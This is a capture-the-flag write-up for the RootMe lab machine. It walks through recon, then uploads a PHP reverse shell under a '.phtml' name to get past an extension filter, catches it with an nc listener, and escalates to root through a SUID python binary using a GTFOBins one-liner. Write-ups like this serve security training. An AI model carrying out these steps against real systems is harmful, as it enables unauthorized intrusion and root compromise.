================================================================================
CTF WRITEUP: ROOTME (FILE UPLOAD & SUID)
Target IP: [TARGET_IP]
================================================================================

1. ENUMERATION & RECON
--------------------------------------------------------------------------------
Command: nmap -sC -sV [TARGET_IP]
Results:
- 22/tcp (SSH)   - OpenSSH 7.6p1
- 80/tcp (HTTP)  - Apache 2.4.41

Web Discovery (Gobuster):
- /panel/   : Upload page found.
- /uploads/ : Directory where uploaded files are stored.

2. INITIAL ACCESS (REVERSE SHELL)
--------------------------------------------------------------------------------
Payload: PentestMonkey PHP Reverse Shell.
Filter Bypass: The server blocks ".php" files.
Action: Renamed the file to "shell.phtml" to bypass the extension filter.

Execution:
1. Start listener: nc -lvnp 4444
2. Upload "shell.phtml" via /panel/.
3. Execute via: http://[TARGET_IP]/uploads/shell.phtml

Shell Stabilization:
python -c 'import pty; pty.spawn("/bin/bash")'
Result: Logged in as www-data.

User Flag: Found in /var/www/user.txt

3. PRIVILEGE ESCALATION (SUID)
--------------------------------------------------------------------------------
Search for SUID binaries:
Command: find / -type f -perm -4000 2>/dev/null

Result: /usr/bin/python is set with SUID permissions. This allows the binary 
to run with the privileges of the file owner (root).

Exploitation (GTFOBins):
Command: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'



4. FINAL FLAGS
--------------------------------------------------------------------------------
Verification: whoami -> root
[USER] cat /var/www/user.txt
[ROOT] cat /root/root.txt
================================================================================
